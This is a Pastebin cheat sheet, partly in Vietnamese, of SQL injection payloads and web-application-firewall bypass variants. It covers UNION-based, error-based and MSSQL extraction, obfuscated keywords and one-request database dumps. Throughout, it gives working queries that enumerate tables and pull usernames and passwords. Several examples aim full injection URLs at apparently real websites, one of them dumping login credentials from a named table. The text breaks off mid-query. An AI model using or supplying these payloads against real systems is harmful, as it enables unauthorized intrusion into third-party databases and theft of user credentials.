Advertisement
Guest User

Bypass

a guest
Oct 9th, 2015
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.25 KB | None | 0 0
  1.  
  2.  
  3. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  4. ~~~~~~~~~~~~~~~~~~~~~~~~~~~:::::Injected By Inj3ct0r:::::~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  5. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  6.  
  7.  
  8. ------------------------------------ ***Dạng Basic "and=0":
  9. **Order lỗi : id=123 and=0 UNION SELECT 1,2-- -
  10. Get table,column,data như bt thêm "and=0" sau id.
  11. ---------------------------------------------------------------------------
  12. ***********Dạng /*!Union*/ /*!Select*/ :
  13.  
  14. **Tìm Order lỗi :link victim+null(-null,-id) /*!Union*/ /*!Select*/ 1,2,3...-- - **Get database :link victim+ /*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!table_name*/) from information_schema./*!tables*/ where table_schema=database()-- -
  15. **Get Colum:link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!column_name*/) 4,5... from information_schema./*!columns*/ where /*!table_name*/=0x+mã hex table-- -
  16. **Get data :link victim +/*!Union*/ /*!Select*/ 1,2,3,group_concat(/*!tên cột,0x7c,tên cột,0x7c,tên cột,0x7c*/) from tên table-- -
  17. -----------------------------------------------------------------
  18. **********Bypass nâng cao dạng /*!Union*/ /*!Select*/ loại ẩn:
  19.  
  20.  
  21. ***Order lỗi : id=-... /*!Union*/ /*!Select*/ 1,2,3...-- -
  22. ***Get database :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
  23. ***Get table :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!table_name*/))),3 from information_schema./*!tables*/ where /*!table_schema*/=database()-- -
  24. ***Get column:id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!column_name*/))),3 from information_schema./*!columns*/ where /*!table_name*/=0x...()-- -
  25. ***Get data :id=-... /*!Union*/ /*!Select*/ 1,unhex(hex(group_concat(/*!tên cột,0x7c,tên cột,0x7c*/))),3 from table -- -
  26. ----------------------------------------------------------------
  27. ***************Dạng Bypass "=" chặn + ẩn :
  28.  
  29.  
  30. ***Order lỗi :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,3,4-- -
  31. ***Get database:id=-..../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000table_name*/))),4 from information_schema. /*!50000tables*/ where /*!50000table_schema*/+like+database()-- -
  32. ***Get column:id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000column_name*/))),4 from information_schema. /*!50000columns*/ where /*!50000table_name*/+like+0x...()-- -
  33. ***Get Data :id=-.../*!50000UNION*/ /*!50000SELECT*/ 1,2,unhex(hex(group_concat(/*!50000tên cột,0x7c,tên cột,0x7c*/))),4 from table-- -
  34. -----------------------------------------------------------------------
  35. ********************Dạng Bypass 403 limit ***(Khó)
  36.  
  37.  
  38. +++Order lỗi :id=-1'+/*!50000union+select*/+1,2,3,4 -- -
  39. +++Get table:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,table_name)+from+information_schema.tables+where+table_schema=database()+limit+1,1-- - ( Để biết thêm table tăng limit lên 1,1-2,1-3,1...)
  40. +++Get column:id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,column_name)+from+information_schema.columns+where+table_name=0x...+limit+1,1-- -(Tăng limit)
  41. +++Get data :id=-1'+/*!50000union+select*/+1,2,3,concat_ws(0x7c,tên cột,tên cột)+from+tên table -- -
  42. --------------------------------------------------------------------------------------------
  43. ----------------------------------Bypass 403 limit ****(cực kì khó)*****
  44. ***Tìm order lỗi :id=-1+/*!50000union+select*/+1,2,3-- -
  45. ***Get table:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,table_name)))+from+/*!information_schema*/.tables+where+table_schema=database()+limit+0,1-- -
  46. ***Get column:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,column_name)))+from+/*!information_schema*/.columns+where+table_name=0x...+limit+0,1-- -
  47. ***Get data:id=-1+/*!50000union+select*/+1,2,unhex(hex(concat_ws/*!(0x7c,tên cột,tên cột))*/)+from+tên table-- -
  48. -------------------------------------------------------------------------
  49. ****Bypass Filter khó (1 order or nhiều order ) :
  50. ***Get table :id=-1 Union Select group_concat(table_name) FrOm infOrMation_schema.tables
  51. ***Get Column :id=-1 Union Select group_concat(column_name) FrOm infOrMation_schema.tables where table_name=0x...-- -
  52. Get Data:id=-1 Union Select group_concat(tên cột,0x7c,tên cột,0x7c) FrOm tên table-- -
  53. ------------------------------------------------------------------------
  54. Dạng id=-1 order by ....-- - không tìm được Order lỗi thì Biến đổi thành id=1' order by
  55. - rồi khai thác Bt.
  56. ~~~>K Get dk table thì id=-1' .... rồi khai thác BT.
  57.  
  58. ***************Dạng Table ẩn (UnIoN SeLeCT):
  59. **Order lỗi : id=-... UNION SELECT 1,2,3,...-- -
  60. **Get Database :id=-... UNION SELECT 1,2,database(),4,...-- - (Thay database() vào order lỗi ).
  61. **Get Table :id=-... UNION SELECT 1,2,unhex(hex(group_concat(table_name))),3,4,... from information_schema.tables where table_schema=database()-- -(Thêm unhex(hex nếu table dạng ẩn )
  62. **Get column :id=-... UNION SELECT 1,2,unhex(hex(group_concat(column_name))),4,5,... from information_schema.columns where table_name=0x mã hex table-- -
  63. **Get data :id=-... UNION SELECT 1,2,unhex(hex(group_concat(tên cột,0x7c,tên cột,0x7c,tên cột))),4,5,6,7,8,9,10,11,12,13 from tên table-- -
  64. -----------------------------------------
  65. ****************XPath Injection(erro base) :
  66. 1.and extractvalue(rand(),concat(0x7c,version(),0x7c,database(),0x7c,user()))-- -
  67. 2.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)))-- -
  68. 3.and extractvalue(rand(),concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns where table_name=0x"table" limit 0,1)))-- -
  69. 4.and extractvalue(rand(),concat(0x7c,(select concat("column",0x7c,"column") from "table" limit 0,1)))-- -
  70. -------------------------------------------
  71. ***Dạng Bypass Xpath( Khó )
  72. 1.' and extractvalue(rand(),concat/*!(0x7c,version(),0x7c,database(),0x7c,user())*/)-- - 2.' and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,table_name) from /*!information_schema*/.tables where table_schema=database() limit 0,1)))-- -
  73. 3.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!(0x7c,column_name) from /*!information_schema*/.columns where table_name=0x"table" limit 0,1)))-- -
  74. 4.'and extractvalue(rand(),concat/*!(*/0x7c,(select concat/*!("column",0x7c,"column") from "table" limit 0,1))*/)-- -
  75. -----------------------------------------
  76. *****************XPath Injection(erro base Cao Cấp )
  77. 1.or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
  78. 2.and updatexml(0,concat(0x7c,(select concat(0x7c,table_name) from information_schema.tables WHERE table_schema=database() limit 0,1)),0)-- -
  79. 3.and updatexml(0,concat(0x7c,(select concat(0x7c,column_name) from information_schema.columns WHERE table_name=0x... limit 0,1)),0)-- -
  80. 4.and updatexml(0,concat(0x7c,(select concat(email,0x7c,password) from tên table limit 0,1)),0)-- -
  81. ---------------------------------------------
  82. ++Khai thác SQL = Erro Base
  83. http://demo-tainguyen.blogspot.com/…/khai-thac-error-based-…
  84. ++Khai thác SQL Blind :
  85. http://ceh.vn/@4rum/showthread.php?tid=1203
  86. ++ sqli form search(tùy site)
  87. 'and p.published =-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- -
  88. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(table_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.tables where table_schema=database()-- -
  89. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(column_name))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from information_schema.columns where table_name=0x62635f7573657273-- -
  90. 'and p.published =-1 UNION SELECT 1,unhex(hex(group_concat(username,0x2f,password))),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from bc_users-- -
  91. Nguồn : copy
  92.  
  93.  
  94.  
  95.  
  96.  
  97.  
  98.  
  99.  
  100.  
  101. + SQL Basic
  102. + SQL ASPX
  103. -------------------------------------------------------------
  104. * Khai thác lỗi SQL cơ bản
  105. + Bước 1: order by 100-- -
  106. + Bước 2: union select 1,2,3,4,5,6,7,8,9,10-- -
  107. + Bước 3: union select 1,2,3,group_concat(table_name),5,6,7,8,9 from information_schema.tables-- -
  108. Rules: có thể sử dụng câu lệnh Unhex(hex
  109. =>>Bước 3: union select 1,2,3,unhex(hex(group_concat(table_name))),5,6,7,8 ,9 from information_schema.tables-- -
  110. + Bước 4: union select 1,2,3,group_concat(column_name),5,6,7,8,9 from information_schema.columns where table_schema=database()--
  111. + Bước 5: union select 1,2,3,group_concat(column_name),5,6,7,,8,9 from information_schema.columns where table_schema=database() and table_name=0x... -- -
  112. chú ý: ở chổ "..." là table mà được mã hóa sang mã hex
  113. =>> được username và password
  114. + Bước 6: union select 1,2,3,group_concat(username,0x20,password,0x20),5, 6,7,8,9 from table_name
  115. --------------------- The End Check Site SQL Basic --------------------
  116. * Khai thác lỗi SQL ASPX
  117. + Bước 1: and 1=convert(int,(select top 1 table_name from information_schema.tables))-- -
  118. + Bước 2: and 1=convert(int,(select top 1 table_name from information_schema.tables where table_name not in ('tbl_DangNhap')-- -
  119. < not in (.....)-- -> viết lệnh tiếp để ra các table, có nghĩa là khi bạn có được "tbl" nào đó thì mình bỏ tiếp cái "tbl" đó vào để check cho nó xuất hiện "tbl" tiếp theo
  120. + Bước 3: and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') ))-- -
  121. =>> được thông số 'ID' tiếp
  122. and 1=convert(int,(select top 1 column name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in('ID') ))-- -
  123. được thông số 'username' tiếp
  124. and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name=('tbl_DangNhap') and column_name not in ('ID'),'username') ))-- -
  125. được thông số password
  126. + Bước 4: Khai thác thông tin username và password:
  127. username:
  128. and 1=convert(int,(select top 1 username from tbl_DangNhap))-- -
  129. passord:
  130. and 1=convert(int,select top 1 password from tbl_DangNhap))-- -
  131.  
  132.  
  133.  
  134.  
  135.  
  136.  
  137.  
  138.  
  139.  
  140. SQLI Injction WAF Bypass Methods With Details
  141. --'- : +--+ / : -- - : --+- : /*
  142. ) order by 1-- -
  143. ') order by 1-- -
  144.  
  145. ')order by 1%23%23
  146.  
  147. %')order by 1%23%23
  148.  
  149. Null' order by 100--+
  150.  
  151. Null' order by 9999--+
  152.  
  153. ')group by 99-- -
  154.  
  155. 'group by 119449-- -
  156.  
  157. 'group/**/by/**/99%23%23
  158.  
  159. union select ByPassing method
  160.  
  161. +union+distinct+select+
  162.  
  163. +union+distinctROW+select+
  164.  
  165. /**//*!12345UNION SELECT*//**/
  166.  
  167. /**//*!50000UNION SELECT*//**/
  168.  
  169. +/*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  170.  
  171. +/*!u%6eion*/+/*!se%6cect*/+
  172.  
  173. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  174.  
  175. 1%')and(0)union(select(1),version(),3,4,5,6)%23%23%23
  176.  
  177. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  178.  
  179. union /*!50000%53elect*/
  180.  
  181. %55nion %53elect
  182.  
  183. +--+Union+--+Select+--+
  184.  
  185. +UnIoN/*&a=*/SeLeCT/*&a=*/
  186.  
  187. id=1+’UnI”On’+'SeL”ECT’
  188.  
  189. id=1+'UnI'||'on'+SeLeCT'
  190.  
  191. UnIoN SeLeCt CoNcAt(version())--
  192.  
  193. uNiOn aLl sElEcT
  194.  
  195. uUNIONnion all sSELECTelect
  196.  
  197. ===================================================================================================================================
  198. :: Buffer Overflow ::
  199. ===================================================================================================================================
  200. +And(select 1)=(select 0×414)+union+select+1–
  201.  
  202. +And(select 1)=(select 0xAAAA)+union+select+1–
  203.  
  204. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141)+
  205.  
  206. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  207.  
  208. ==================================================================================================================================
  209. :: 400 Bad Request ::
  210. ==================================================================================================================================
  211. –+%0A
  212.  
  213. union+select+1–+%0A,2–+%0A,3–+%0A,4–+%0A,5–+%0A –
  214.  
  215. ==================================================================================================================================
  216. null the parameter
  217. ==================================================================================================================================
  218. id=-1
  219.  
  220. id=null
  221.  
  222. id=1+and+false+
  223.  
  224. id=9999
  225.  
  226. id=1 and 0
  227.  
  228. id==1
  229.  
  230. id=(-1)
  231.  
  232. =======================================================================================================================================
  233. Group_Concat
  234. =======================================================================================================================================
  235. Group_Concat
  236.  
  237. group_concat()
  238.  
  239. /*!group_concat*/()
  240.  
  241. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  242.  
  243. group_concat(,0x3c62723e)
  244.  
  245. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22~BlackRose%22%29
  246.  
  247. CoNcAt()
  248.  
  249. CONCAT(DISTINCT Version())
  250.  
  251. concat(,0x3a,)
  252.  
  253. concat%00()
  254.  
  255. %00CoNcAt()
  256.  
  257. /*!50000cOnCat*/(/*!Version()*/)
  258.  
  259. /*!50000cOnCat*/
  260.  
  261. /**//*!12345cOnCat*/(,0x3a,)
  262.  
  263. concat_ws()
  264.  
  265. concat(0x3a,,0x3c62723e)
  266.  
  267. /*!concat_ws(0x3a,)*/
  268.  
  269. concat_ws(0x3a3a3a,version()
  270.  
  271. CONCAT_WS(CHAR(32,58,32),version(),)
  272.  
  273. REVERSE(tacnoc)
  274.  
  275. binary(version())
  276.  
  277. uncompress(compress(version()))
  278.  
  279. aes_decrypt(aes_encrypt(version(),1),1)
  280.  
  281. ====================================================================================================================================
  282. To appear column numbr in page put after id
  283. ====================================================================================================================================
  284. id=1+and+1=0+union+select+1,2,3,4,5,6
  285.  
  286. +AND+1=0
  287.  
  288. /*!aND*/ 1 like 0
  289.  
  290. +/*!and*/+1=0
  291.  
  292. +and+2>3+
  293.  
  294. +and(1)=(0)
  295.  
  296. and (1)!=(0)
  297.  
  298. +div+0
  299.  
  300. Having+1=0
  301.  
  302. ===================================================================================================================================
  303. function ByPassing
  304. ===================================================================================================================================
  305. unhex(hex(value))
  306.  
  307. cast(value as char)
  308.  
  309. uncompress(compress(version()))
  310.  
  311. cast(version() as char)
  312.  
  313. aes_decrypt(aes_encrypt(version(),1),1)
  314.  
  315. binary(version())
  316.  
  317. convert(value using ascii)
  318.  
  319. ===================================================================================================================================
  320. avoid source page injection
  321. ===================================================================================================================================
  322. concat(?”>,
  323.  
  324. ,@@version,?
  325.  
  326. “>
  327. ?
  328.  
  329. injection
  330.  
  331. concat(0x223e,@@version)
  332.  
  333. concat(0x273e27,version(),0x3c212d2d)
  334.  
  335. concat(0x223e3c62723e,version(),0x3c696d67207372633d22)
  336.  
  337. concat(0x223e,@@version,0x3c696d67207372633d22)
  338.  
  339. concat(0x223e,0x3c62723e3c62723e3c62723e,@@version,0x3c696d67207372633d22,0x3c62723e)
  340.  
  341. concat(0x223e3c62723e,@@version,0x3a,”BlackRose”,0x3c696d67207372633d22)
  342.  
  343. concat(‘’,@@version,’’)
  344.  
  345. concat(0x273c2f7469746c653e27,@@version,0x273c7469746c653e27)
  346.  
  347. concat(0x273c2f7469746c653e27,version(),0x273c7469746c653e27)
  348.  
  349. ===================================================================================================================================
  350. get version – DB_NAME – user – HOST_NAME – datadir
  351. ===================================================================================================================================
  352. version()
  353.  
  354. convert(version() using latin1)
  355.  
  356. unhex(hex(version()))
  357.  
  358. @@GLOBAL.VERSION
  359.  
  360. (substr(@@version,1,1)=5) :: 1 true 0 fals
  361.  
  362. # like #
  363.  
  364. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(substr(@@version,1,1)=5),4,5 –
  365.  
  366. ==================================================================================================================================
  367. +and substring(version(),1,1)=4
  368.  
  369. +and substring(version(),1,1)=5
  370.  
  371. +and substring(version(),1,1)=9
  372.  
  373. +and substring(version(),1,1)=10
  374.  
  375. id=1 /*!50094aaaa*/ error
  376.  
  377. id=1 /*!50095aaaa*/ no error
  378.  
  379. id=1 /*!50096aaaa*/ error
  380.  
  381. # like # http://www.marinaplast.com/page.php?id=13 /*!50095aaaa*/
  382.  
  383. id=1 /*!40123 1=1*/–+- no error
  384.  
  385. id=1 /*!40122rrrr*/ no error
  386.  
  387. # like # http://www.marinaplast.com/page.php?id=13 /*!40122rrrr*/ error not v4
  388. =================================================================================================================================
  389. DB_NAME()
  390. =================================================================================================================================
  391. @@database
  392. database()
  393. id=vv()
  394. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,DB_NAME(),4,5 –
  395. http://www.marinaplast.com/page.php?id=vv()
  396. @@user
  397. user()
  398. user_name()
  399. system_user()
  400. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,user(),4,5 –
  401.  
  402. HOST_NAME()
  403. @@hostname
  404. @@servername
  405. SERVERPROPERTY()
  406.  
  407. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,HOST_NAME(),4,5 –
  408. @@datadir
  409. datadir()
  410. # like # http://www.marinaplast.com/page.php?id=-13 union select 1,2,datadir(),4,5 –
  411. ASPX
  412. and 1=0/@@version
  413. ‘ and 1=0/@@version;–
  414. ‘) and 1=@@version–
  415. and 1=0/user;–
  416.  
  417. Requested method
  418. [DUMP DB in 1 Request]
  419.  
  420. (select (@) from (select(@:=0×00),(select (@) from (information_schema.columns) where (table_schema>=@) and (@)in (@:=concat(@,0x0a,’ [ ',table_schema,' ] >’,table_name,’ > ‘,column_name))))x)
  421.  
  422. (select(@) from (select (@:=0×00),(select (@) from (table) where (@) in (@:=concat(@,0x0a,column1,0x3a,column2))))a)
  423. ===================================================================================================================================
  424. [DUMP DB in 1 Request improve]
  425. ===================================================================================================================================
  426.  
  427. (select(@x)from(select(@x:=0×00),(select(0)from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x)
  428.  
  429. like
  430. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select(@x)from(select(@x:=0×00),(select(0)from(information_schema.colu mns)where(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and(0×00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0x3a,column_name))))x),4,5 –
  431. ===================================================================================================================================
  432. #2#
  433. ===================================================================================================================================
  434. method like DUMP DB in 1 Request
  435. ===================================================================================================================================
  436. concat(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT( @o,0xd0a,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1)))
  437. like
  438. http://www.mishnetorah.com/shop/details.php…(@i:=0×00,@o:=0xd0a,benchmark(40,@o:=CONCAT(@o,0xd0a ,(SELECT concat(table_schema,0x2E,@i:=table_name) FROM information_schema.tables WHERE table_name>@i order by table_name LIMIT 1))),@o),5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21
  439. ===================================================================================================================================
  440. #3#
  441. ===================================================================================================================================
  442. databases
  443.  
  444. (select+count(schema_name) +from+information_schema.schemata)
  445.  
  446. # like #
  447. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(schema_name) +from+information_schema.schemata),4,5 –
  448.  
  449. tables
  450. (select+count(table_name) +from+information_schema.tables)
  451. # like #
  452. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(table_name) +from+information_schema.tables),4,5 –
  453.  
  454. columns
  455. (select+count(column_name) +from+information_schema.columns)
  456. # like #
  457. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+count(column_name) +from+information_schema.columns),4,5 –
  458. ===================================================================================================================================
  459. #4#
  460. ===================================================================================================================================
  461. show the table with all her columns
  462.  
  463. CONCAT(table_name,0x3e,GROUP_CONCAT(column_name))
  464.  
  465. +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 1,1–+
  466.  
  467. like
  468. http://www.marinaplast.com/page.php?id=-13 union select 1,2,CONCAT(table_name,0x3e,GROUP_CONCAT(column_name)),4,5 +FROM information_schema.columns WHERE table_schema=database() GROUP BY table_name LIMIT 0,1–+
  469. ===================================================================================================================================
  470. #5#WWWWWWWWWWWAAAAAAAAAAAAAAAAAAFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
  471. ===================================================================================================================================
  472. feltered requested
  473.  
  474. # tables #
  475. group_concat(/*!table_name*/)
  476.  
  477. +/*!froM*/ /*!InfORmaTion_scHema*/.tAblES– -
  478.  
  479. /*!froM*/ /*!InfORmaTion_scHema*/.tAblES /*!WhERe*/ /*!TaBle_ScHEmA*/=schEMA()– -
  480.  
  481. /*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()– -
  482. ===================================================================================================================================
  483. # columns #
  484. ===================================================================================================================================
  485. group_concat(/*!column_name*/)
  486.  
  487. +/*!froM*/ InfORmaTion_scHema.cOlumnS /*!WheRe*/ /*!tAblE_naMe*/=hex table
  488.  
  489. /*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table
  490.  
  491. /*!froM*/ table– -
  492. ===================================================================================================================================
  493. #6#
  494. ===================================================================================================================================
  495. bypass method
  496.  
  497. (select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA())
  498.  
  499. (select+group_concat(/*!column_name*/)+/*!From*/+%69nformation_schema./**/columns+/*!50000Where*/+/*!%54able_name*/=hex table)
  500.  
  501. like
  502. http://www.marinaplast.com/page.php?id=-13 union select 1,2,(select+group_concat(/*!table_name*/)+/*!From*/+%69nformation_schema./**/tAblES+/*!50000Where*/+/*!%54able_ScHEmA*/=schEMA()),4,5 –
  503. ===================================================================================================================================
  504. #7#
  505. ===================================================================================================================================
  506. bypass method
  507.  
  508. unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name)))
  509.  
  510. /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)
  511.  
  512. like
  513. http://www.marinaplast.com/page.php?id=-13 union select 1,2,unhex(hex(Concat(Column_Name,0x3e,Table_schema,0x3e,table_Name))),4,5 /*!from*/information_schema.columns/*!where*/column_name%20/*!like*/char(37,%20112,%2097,%20115,%20115,%2037)–
  514.  
  515. ===================================================================================================================================
  516. [+] Union Select:
  517. ===================================================================================================================================
  518. union /*!select*/+
  519. union/**/select/**/
  520. /**/union/**/select/**/
  521. /**/union/*!50000select*/
  522. /**//*!12345UNION SELECT*//**/
  523. /**//*!50000UNION SELECT*//**/
  524. /**/uniUNIONon/**/selSELECTect/**/
  525. /**/uniUNIONon/**/aALLll/**/selSELECTect/**/
  526. /**//*!union*//**//*!select*//**/
  527. /**/UNunionION/**/SELselectECT/**/
  528. /**//*UnIOn*//**//*SEleCt*//**/
  529. /**//*U*//*n*//*I*//*O*//*n*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  530. /**/UNunionION/**/all/**/SELselectECT/**/
  531. /**//*UnIOn*//**/all/**//*SEleCt*//**/
  532. /**//*U*//*n*//*I*//*O*//*n*//**//*all*//**//*S*//*E*//*l*//*e*//*C*//*t*//**/
  533. uni
  534. %20union%20/*!select*/%20
  535. union%23aa%0Aselect
  536. union+distinct+select+
  537. union+distinctROW+select+
  538. /*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
  539. %252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
  540. %23sexsexsex%0AUnIOn%23sexsexsex%0ASeLecT+
  541. /*!50000UnIoN*/ /*!50000SeLeCt aLl*/+
  542. /*!u%6eion*/+/*!se%6cect*/+
  543. 1%’)and(0)union(select(1),version(),3,4,5,6)%23%23%23
  544. /*!50000%55nIoN*/+/*!50000%53eLeCt*/
  545. union /*!50000%53elect*/
  546. +%2F**/+Union/*!select*/
  547. %55nion %53elect
  548. +–+Union+–+Select+–+
  549. +UnIoN/*&a=*/SeLeCT/*&a=*/
  550. uNiOn aLl sElEcT
  551. uUNIONnion all sSELECTelect
  552. union(select(1),2,3)
  553. union (select 1111,2222,3333)
  554. union (/*!/**/ SeleCT */ 11)
  555. %0A%09UNION%0CSELECT%10NULL%
  556. /*!union*//*–*//*!all*//*–*//*!select*/
  557. union%23foo*%2F*bar%0D%0Aselect%23foo%0D%0A1% 2C2%2C
  558. union+sel%0bect
  559. +uni*on+sel*ect+
  560. +‪#‎1q‬%0Aunion all#qa%0A#%0Aselect 1,2,3,4,5,6,7,8,9,10%0A#a
  561. union(select (1),(2),(3),(4),(5))
  562. UNION(SELECT(column)FROM(table))
  563. id=1+’UnI”On’+’SeL”ECT’
  564. id=1+’UnI’||’on’+SeLeCT’
  565. union select 1–+%0A,2–+%0A,3–+%0A etc ….
  566. ===================================================================================================================================
  567. [+] Buffer overflow:
  568. ===================================================================================================================================
  569. +And(select 1)=(select 0×414)+union+select+1–
  570. +And(select 1)=(select 0xAAAA)+union+select+1–
  571. +and (/*!select*/ 1)=(/*!select*/ 0xAA)+
  572. +and (/*!select*/ 1)=(/*!select*/ 0×414)+
  573. +And(select 1)=(select 0×4141414141414141414141414141414141414141414141414141414141414141414141414?1414 14141414141414141414141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141414141414141414?141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 41414141414141414141414141414141414141414141414141414141414141414141414141414141 4141)+
  574. ===================================================================================================================================
  575. [+] Group Concat:
  576. ===================================================================================================================================
  577. Group_Concat
  578. group_concat()
  579. /*!group_concat*/()
  580. grOUp_ConCat(/*!*/,0x3e,/*!*/)
  581. group_concat(,0x3c62723e)
  582. g%72oup_c%6Fncat%28%76%65rsion%28%29,%22testtest%22%29
  583. CoNcAt()
  584. CONCAT(DISTINCT Version())
  585. concat(,0x3a,)
  586. concat%00()
  587. %00CoNcAt()
  588. /*!50000cOnCat*/(/*!Version()*/)
  589. /*!50000cOnCat*/
  590. /**//*!12345cOnCat*/(,0x3a,)
  591. concat_ws()
  592. concat(0x3a,,0x3c62723e)
  593. /*!concat_ws(0x3a,)*/
  594. concat_ws(0x3a3a3a,version()
  595. CONCAT_WS(CHAR(32,58,32),version(),)
  596. ===================================================================================================================================
  597. ERORE BASED
  598. ===================================================================================================================================
  599. =21 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1–
  600.  
  601. Database
  602.  
  603. 21 and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  604.  
  605. Table_name
  606.  
  607. and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 19,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  608.  
  609. Columns
  610.  
  611. 21 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x73657474696e6773 limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  612.  
  613. extract date
  614.  
  615. http://www.aliqbalschools.org/index.php… and (select 1 from (select count(*),concat((select(select concat(cast(concat(userName,0x7e,passWord) as char),0x7e)) from iqbal_iqbal.settings limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  616.  
  617. Notice the limit function in the query
  618. A website can have more than 2 two databases, so increase the limit until you find all database names
  619. Example: limit 0,1 or limit 1,1 or limit 2,1
  620. ===================================================================================================================================
  621. Differences:
  622. Error Based Query for Database Extraction:
  623. ===================================================================================================================================
  624. and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  625.  
  626. Double Query for Database Extraction:
  627.  
  628. and(select 1 from(select count(*),concat((select (select concat(0x7e,0×27,cast(database() as char),0×27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from
  629. information_schema.tables group by x)a) and 1=1
  630.  
  631. and(select 1 from(select count(*),concat((select (select (SELECT distinct
